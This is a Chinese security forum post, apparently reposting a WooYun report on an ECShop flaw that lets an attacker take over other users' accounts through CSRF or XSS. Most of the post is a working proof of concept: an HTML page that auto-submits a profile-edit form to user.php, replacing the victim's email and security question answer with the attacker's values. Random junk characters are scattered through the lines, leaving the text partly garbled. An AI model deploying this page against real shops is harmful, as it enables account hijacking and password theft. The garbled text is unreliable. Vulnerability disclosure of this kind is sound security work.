找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2397|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
8 b' q. G1 w9 X% v4 d# [, V) Q. k: Vecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
: K8 W! B# L6 `( p2 |7 L2 \  ^
, K( S- D: }; p/ A9 zDemo For:http://www.wooyun.org/bug.php?action=view&id=395
& D3 V6 ^; V& J: p
; B' G+ N( W; x详细说明:7 u" C8 r( s" R, X
利用csrf和xss可以突破官方所说的“障碍”9 ]; t1 _3 {: p3 i, T4 j- @2 R
xss版本已经有人说明
) b+ y! n( Z+ ]$ A* J& |& h这里给出csrf版本
; c1 t: R3 D. P; I; E6 C* A: O2 e7 q% l3 l, T2 @$ V+ j
漏洞证明:% Z0 |6 c- @' D, F  R5 [
<html>
# h* g8 Q6 [/ T* }: X9 I<body># j& Q2 T+ h3 d3 F, N) k
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
: Y, g' p. [% a<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
- m  K! C) b: ^* V' F' J* _, I$ U4 _<INPUT TYPE="text" NAME="act" value="act_edit_profile">
  R1 Q1 W, C$ T1 B<INPUT TYPE="text" NAME="sel_question" value="ecshop">
/ @5 Q: a6 X1 B<INPUT TYPE="text" NAME="passwd_answer" value="exploit">. r. e! b3 k7 z% F2 M% f
</body>
: a" R( J0 s, d! h8 ?- o" y4 x) D<script>
9 x$ X3 q! s0 s0 Qdocument.forms[0].submit();4 R# r  L* l' R0 s# M
</script>
$ q# u3 r/ I) o* l</html>" X8 X4 e2 e+ F( F
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
% o( ?+ L# b$ e8 T5 y! q  f1 C7 Y. T( z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表